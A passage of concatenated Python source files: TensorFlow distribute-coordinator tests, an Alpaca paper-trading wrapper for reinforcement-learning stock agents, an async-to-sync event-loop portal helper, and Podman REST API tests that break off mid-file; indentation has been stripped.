cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertFalse(self._std_servers[WORKER][1].joined)
self.assertFalse(self._std_servers[WORKER][2].joined)
def testBetweenGraphStrategyProperties(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps properties of the strategy objects.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
def testInGraphContextWithEval(self):
# Adds an EVALUATOR job.
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, has_eval=True)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
threads[EVALUATOR][0].join()
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
(cluster_spec[EVALUATOR][0], 3, True, False))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 2)
self.assertTrue(WORKER in self._std_servers)
self.assertTrue(EVALUATOR in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
self.assertFalse(self._std_servers[EVALUATOR][0].joined)
def testRunStdServerInGoogleEnvironment(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
tf_config = {"cluster": cluster_spec, "environment": "google"}
joined = [False]
def _fake_sleep(_):
joined[0] = True
original_sys_exit(0)
def _thread_fn(cluster_spec):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
time, "sleep", _fake_sleep):
t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
t.start()
t.join()
self.assertTrue(joined[0])
def testRpcLayerEnvironmentVariable(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}
rpc_layer_from_coordinator = [None]
def _run_mock_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None,
environment=None):
del cluster_spec, task_type, task_id, session_config, environment
rpc_layer_from_coordinator[0] = rpc_layer
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _run_mock_server):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
self.assertEqual(rpc_layer_from_coordinator[0], "cake")
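# Verifies that device filters and parallelism-thread settings chosen by the strategy's configure step
# show up both in the std server's session_config and in the worker context's session_config.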
class StrategyConfigureTest(test.TestCase):
def setUp(self):
self._device_filters = []
self._intra_op_parallelism_threads = None
self._inter_op_parallelism_threads = None
super(StrategyConfigureTest, self).setUp()
def _dump_device_filters(self, *args, **kwargs):
session_config = kwargs.get("session_config", None)
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def _worker_fn(self, strategy):
worker_context = distribute_coordinator_context.get_current_worker_context()
session_config = worker_context._session_config
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def test_session_config_in_std_server(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server",
self._dump_device_filters):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._intra_op_parallelism_threads, 1)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_session_config_in_session_creator(self):
cluster_spec = {"worker": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
self._worker_fn,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._device_filters, ["/job:worker/task:0", "/job:ps"])
self.assertEqual(self._intra_op_parallelism_threads, 2)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_eval_strategy_configure(self):
cluster_spec = {"evaluator": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=False),
eval_fn=self._worker_fn,
eval_strategy=MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="evaluator",
task_id=0)
self.assertEqual(self._device_filters, ["/job:somejob"])
self.assertEqual(self._intra_op_parallelism_threads, 0)
self.assertEqual(self._inter_op_parallelism_threads, 2)
class RunStandardTensorflowServerTest(test.TestCase):
def test_std_server_arguments(self):
cs = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cs, "task": {"type": "ps", "id": 0}}
def _mock_run_std_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None):
self.assertEqual(cluster_spec.as_dict(), cs)
self.assertEqual(task_type, "ps")
self.assertEqual(task_id, 0)
self.assertEqual(session_config.experimental.collective_group_leader,
"/job:worker/replica:0/task:0")
self.assertEqual(session_config.intra_op_parallelism_threads, 1)
self.assertEqual(rpc_layer, "grpc")
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _mock_run_std_server):
session_config = config_pb2.ConfigProto()
session_config.intra_op_parallelism_threads = 1
mock_server = distribute_coordinator.run_standard_tensorflow_server(
session_config)
self.assertTrue(mock_server.started)
if __name__ == "__main__":
# TODO(yuefengz): find a smart way to terminate std server threads.
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
env_stock_papertrading.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import gym
import numpy as np
import pandas as pd
import torch
from finrl_meta.data_processors.processor_alpaca import AlpacaProcessor
class AlpacaPaperTrading():
def __init__(self, ticker_list, time_interval, drl_lib, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
APCA_API_BASE_URL, tech_indicator_list, turbulence_thresh=30,
max_stock=1e2, latency=None):
# load agent
self.drl_lib = drl_lib
if agent == 'ppo':
if drl_lib == 'elegantrl':
from elegantrl.agent import AgentPPO
from elegantrl.run import Arguments, init_agent
# load agent
config = {'state_dim': state_dim,
'action_dim': action_dim, }
args = Arguments(agent=AgentPPO, env=StockEnvEmpty(config))
args.cwd = cwd
args.net_dim = net_dim
# load agent
try:
agent = init_agent(args, gpu_id=0)
self.act = agent.act
self.device = agent.device
except BaseException:
raise ValueError("Fail to load agent!")
elif drl_lib == 'rllib':
from ray.rllib.agents import ppo
from ray.rllib.agents.ppo.ppo import PPOTrainer
config = ppo.DEFAULT_CONFIG.copy()
config['env'] = StockEnvEmpty
config["log_level"] = "WARN"
config['env_config'] = {'state_dim': state_dim,
'action_dim': action_dim, }
trainer = PPOTrainer(env=StockEnvEmpty, config=config)
try:
trainer.restore(cwd)
self.agent = trainer
print("Restoring from checkpoint path", cwd)
except BaseException:
raise ValueError('Failed to load agent!')
elif drl_lib == 'stable_baselines3':
from stable_baselines3 import PPO
try:
# load agent
self.model = PPO.load(cwd)
print("Successfully load model", cwd)
except BaseException:
raise ValueError('Failed to load agent!')
else:
raise ValueError('The DRL library input is NOT supported yet. Please check your input.')
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, APCA_API_BASE_URL, 'v2')
except BaseException:
raise ValueError('Failed to connect to Alpaca. Please check account info and internet connection.')
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def test_latency(self, test_times=10):
total_time = 0
for i in range(0, test_times):
time0 = time.time()
self.get_state()
time1 = time.time()
temp_time = time1 - time0
total_time += temp_time
latency = total_time / test_times
print('latency for data processing: ', latency)
return latency
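# Main trading loop: cancel open orders, wait for the market to open, then trade once per
# self.time_interval and record account equity, stopping shortly before the market closes.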
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if (self.timeToClose < (60)):
# Stop trading when less than 1 minute remains until market close.
print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
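# Query the loaded policy for an action and turn it into market orders: entries above min_action
# trigger buys, entries below -min_action trigger sells; when turbulence is high, all positions are sold.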
def trade(self):
state = self.get_state()
if self.drl_lib == 'elegantrl':
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=self.device)
a_tensor = self.act(s_tensor)
action = a_tensor.detach().cpu().numpy()[0]
action = (action * self.max_stock).astype(int)
elif self.drl_lib == 'rllib':
action = self.agent.compute_single_action(state)
elif self.drl_lib == 'stable_baselines3':
action = self.model.predict(state)[0]
else:
raise ValueError('The DRL library input is NOT supported yet. Please check your input.')
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
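# Build the observation vector fed to the policy: scaled cash, turbulence, prices,
# share holdings, cooldown counters and technical indicators.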
def get_state(self):
alpaca = AlpacaProcessor(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(self.cash * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
class StockEnvEmpty(gym.Env):
# Empty Env used for loading rllib agent
def __init__(self, config):
state_dim = config['state_dim']
action_dim = config['action_dim']
self.env_num = 1
self.max_step = 10000
self.env_name = 'StockEnvEmpty'
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = False
self.target_return = 9999
self.observation_space = gym.spaces.Box(low=-3000, high=3000, shape=(state_dim,), dtype=np.float32)
self.action_space = gym.spaces.Box(low=-1, high=1, shape=(action_dim,), dtype=np.float32)
def reset(self):
return
def step(self, actions):
return
|
portal.py
|
__all__ = ("Portal", "create_portal")
import asyncio
import threading
import typing as t
class Portal:
def __init__(self, stop_event: t.Any) -> None:
"""
The portal for async to sync conversion.
Parameters
----------
stop_event: t.Any
The stop event.
"""
self.loop = asyncio.get_event_loop()
self.stop_event = stop_event
@staticmethod
async def _call(fn: t.Callable, args: t.Any, kwargs: t.Any) -> t.Any:
"""
Call the coroutine.
Parameters
----------
fn: t.Callable
The function to be called.
args: t.Any
The function arguments.
kwargs: t.Any
The function kwargs.
Returns
-------
t.Any
The values returned by the function.
"""
return await fn(*args, **kwargs)
async def _stop(self) -> None:
"""
Set the stop event.
Returns
-------
None
"""
self.stop_event.set()
def call(self, fn: t.Callable, *args, **kwargs) -> t.Any:
"""
Call the coroutine.
Parameters
----------
fn: t.Callable
The function to be called.
Returns
-------
t.Any
The values returned by the function.
"""
return asyncio.run_coroutine_threadsafe(self._call(fn, args, kwargs), self.loop)
def stop(self) -> None:
"""
Call the stop event.
Returns
-------
None
"""
return self.call(self._stop)
def create_portal() -> t.Any:
"""
Create the portal object with function initialized.
Returns
-------
t.Any
The portal object.
Examples
--------
.. code-block:: python
async def test(msg):
await asyncio.sleep(0.5)
print(msg)
return "HELLO " + msg
# It'll run a new event loop in separate thread
portal = create_portal()
# It'll call `test` in the separate thread and return a Future
print(portal.call(test, "WORLD").result())
# Stop the portal.
portal.stop().result()
"""
portal = None
async def wait_stop() -> None:
nonlocal portal
stop_event = asyncio.Event()
portal = Portal(stop_event)
running_event.set()
await stop_event.wait()
def run() -> t.Any:
asyncio.run(wait_stop())
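# Run the event loop in a background thread and block until the Portal has been created there.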
running_event = threading.Event()
thread = threading.Thread(target=run)
thread.start()
running_event.wait()
return portal
|
test_rest_v2_0_0.py
|
import json
import os
import random
import string
import subprocess
import sys
import time
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from test.apiv2.rest_api import Podman
PODMAN_URL = "http://localhost:8080"
def _url(path):
return PODMAN_URL + "/v2.0.0/libpod" + path
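# Substitute the Id of the first container reported by the service into the given path template.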
def ctnr(path):
r = None
try:
r = requests.get(_url("/containers/json?all=true"))
ctnrs = json.loads(r.text)
except Exception as e:
msg = f"Bad container response: {e}"
if r is not None:
msg = msg + " " + r.text
sys.stderr.write(msg + "\n")
raise
return path.format(ctnrs[0]["Id"])
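# Parse the response body and ensure each returned object (or the single object) carries an Id field.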
def validateObjectFields(buffer):
objs = json.loads(buffer)
if not isinstance(objs, dict):
for o in objs:
_ = o["Id"]
else:
_ = objs["Id"]
return objs
class TestApi(unittest.TestCase):
podman = None # initialized podman configuration for tests
service = None # podman service instance
def setUp(self):
super().setUp()
TestApi.podman.run("run", "alpine", "/bin/ls", check=True)
def tearDown(self) -> None:
super().tearDown()
TestApi.podman.run("pod", "rm", "--all", "--force", check=True)
TestApi.podman.run("rm", "--all", "--force", check=True)
@classmethod
def setUpClass(cls):
super().setUpClass()
TestApi.podman = Podman()
TestApi.service = TestApi.podman.open("system", "service", "tcp:localhost:8080", "--time=0")
# give the service some time to be ready...
time.sleep(2)
returncode = TestApi.service.poll()
if returncode is not None:
raise subprocess.CalledProcessError(returncode, "podman system service")
r = requests.post(_url("/images/pull?reference=docker.io%2Falpine%3Alatest"))
if r.status_code != 200:
raise subprocess.CalledProcessError(
r.status_code, f"podman images pull docker.io/alpine:latest {r.text}"
)
@classmethod
def tearDownClass(cls):
TestApi.service.terminate()
stdout, stderr = TestApi.service.communicate(timeout=0.5)
if stdout:
sys.stdout.write("\nService Stdout:\n" + stdout.decode("utf-8"))
if stderr:
sys.stderr.write("\nService Stderr:\n" + stderr.decode("utf-8"))
return super().tearDownClass()
def test_info(self):
r = requests.get(_url("/info"))
self.assertEqual(r.status_code, 200)
self.assertIsNotNone(r.content)
_ = json.loads(r.text)
info = requests.get(PODMAN_URL + "/v1.40/info")
self.assertEqual(info.status_code, 200, info.content)
_ = json.loads(info.text)
def test_events(self):
r = requests.get(_url("/events?stream=false"))
self.assertEqual(r.status_code, 200, r.text)
self.assertIsNotNone(r.content)
report = r.text.splitlines()
self.assertGreater(len(report), 0, "No events found!")
for line in report:
obj = json.loads(line)
# Actor.ID is uppercase for compatibility
self.assertIn("ID", obj["Actor"])
def test_containers(self):
r = requests.get(_url("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.text)
self.assertEqual(len(obj), 0)
def test_containers_all(self):
r = requests.get(_url("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
validateObjectFields(r.text)
def test_inspect_container(self):
r = requests.get(_url(ctnr("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
obj = validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_stats(self):
r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
validateObjectFields(r.text)
def test_delete_containers(self):
r = requests.delete(_url(ctnr("/containers/{}")))
self.assertEqual(r.status_code, 204, r.text)
def test_stop_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start_containers(self):
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertEqual(r.text, "", r.text)
def test_attach_containers(self):
self.skipTest("FIXME: Test timeouts")
r = requests.post(_url(ctnr("/containers/{}/attach")), timeout=5)
self.assertIn(r.status_code, (101, 500), r.text)
def test_logs_containers(self):
r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
# TODO Need to support Docker-py order of network/container creates
def test_post_create_compat_connect(self):
"""Create network and container then connect to network"""
net_default = requests.post(
PODMAN_URL + "/v1.40/networks/create", json={"Name": "TestDefaultNetwork"}
)
self.assertEqual(net_default.status_code, 201, net_default.text)
create = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=postCreateConnect",
json={
"Cmd": ["top"],
"Image": "alpine:latest",
"NetworkDisabled": False,
# FIXME adding these 2 lines cause: (This is sampled from docker-py)
# "network already exists","message":"container
# 01306e499df5441560d70071a54342611e422a94de20865add50a9565fd79fb9 is already connected to CNI
# network \"TestDefaultNetwork\": network already exists"
# "HostConfig": {"NetworkMode": "TestDefaultNetwork"},
# "NetworkingConfig": {"EndpointsConfig": {"TestDefaultNetwork": None}},
# FIXME These two lines cause:
# CNI network \"TestNetwork\" not found","message":"error configuring network namespace for container
# 369ddfa7d3211ebf1fbd5ddbff91bd33fa948858cea2985c133d6b6507546dff: CNI network \"TestNetwork\" not
# found"
# "HostConfig": {"NetworkMode": "TestNetwork"},
# "NetworkingConfig": {"EndpointsConfig": {"TestNetwork": None}},
# FIXME no networking defined cause: (note this error is from the container inspect below)
# "internal libpod error","message":"network inspection mismatch: asked to join 2 CNI network(s) [
# TestDefaultNetwork podman], but have information on 1 network(s): internal libpod error"
},
)
self.assertEqual(create.status_code, 201, create.text)
payload = json.loads(create.text)
self.assertIsNotNone(payload["Id"])
start = requests.post(PODMAN_URL + f"/v1.40/containers/{payload['Id']}/start")
self.assertEqual(start.status_code, 204, start.text)
connect = requests.post(
PODMAN_URL + "/v1.40/networks/TestDefaultNetwork/connect",
json={"Container": payload["Id"]},
)
self.assertEqual(connect.status_code, 200, connect.text)
self.assertEqual(connect.text, "OK\n")
inspect = requests.get(f"{PODMAN_URL}/v1.40/containers/{payload['Id']}/json")
self.assertEqual(inspect.status_code, 200, inspect.text)
payload = json.loads(inspect.text)
self.assertFalse(payload["Config"].get("NetworkDisabled", False))
self.assertEqual(
"TestDefaultNetwork",
payload["NetworkSettings"]["Networks"]["TestDefaultNetwork"]["NetworkID"],
)
# TODO restore this to test, when joining multiple networks possible
# self.assertEqual(
# "TestNetwork",
# payload["NetworkSettings"]["Networks"]["TestNetwork"]["NetworkID"],
# )
# TODO Need to support network aliases
# self.assertIn(
# "test_post_create",
# payload["NetworkSettings"]["Networks"]["TestNetwork"]["Aliases"],
# )
def test_post_create_compat(self):
"""Create network and connect container during create"""
net = requests.post(PODMAN_URL + "/v1.40/networks/create", json={"Name": "TestNetwork"})
self.assertEqual(net.status_code, 201, net.text)
create = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=postCreate",
json={
"Cmd": ["date"],
"Image": "alpine:latest",
"NetworkDisabled": False,
"HostConfig": {"NetworkMode": "TestNetwork"},
},
)
self.assertEqual(create.status_code, 201, create.text)
payload = json.loads(create.text)
self.assertIsNotNone(payload["Id"])
inspect = requests.get(f"{PODMAN_URL}/v1.40/containers/{payload['Id']}/json")
self.assertEqual(inspect.status_code, 200, inspect.text)
payload = json.loads(inspect.text)
self.assertFalse(payload["Config"].get("NetworkDisabled", False))
self.assertEqual(
"TestNetwork",
payload["NetworkSettings"]["Networks"]["TestNetwork"]["NetworkID"],
)
def test_commit(self):
r = requests.post(_url(ctnr("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.content)
self.assertIsInstance(obj, dict)
self.assertIn("Id", obj)
def test_images_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageList
required_keys = (
"Id",
"ParentId",
"RepoTags",
"RepoDigests",
"Created",
"Size",
"SharedSize",
"VirtualSize",
"Labels",
"Containers",
)
objs = json.loads(r.content)
self.assertIn(type(objs), (list,))
for o in objs:
self.assertIsInstance(o, dict)
for k in required_keys:
self.assertIn(k, o)
def test_inspect_image_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/alpine/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageInspect
required_keys = (
"Id",
"Parent",
"Comment",
"Created",
"Container",
"DockerVersion",
"Author",
"Architecture",
"Os",
"Size",
"VirtualSize",
"GraphDriver",
"RootFS",
"Metadata",
)
obj = json.loads(r.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
_ = parse(obj["Created"])
def test_delete_image_compat(self):
r = requests.delete(PODMAN_URL + "/v1.40/images/alpine?force=true")
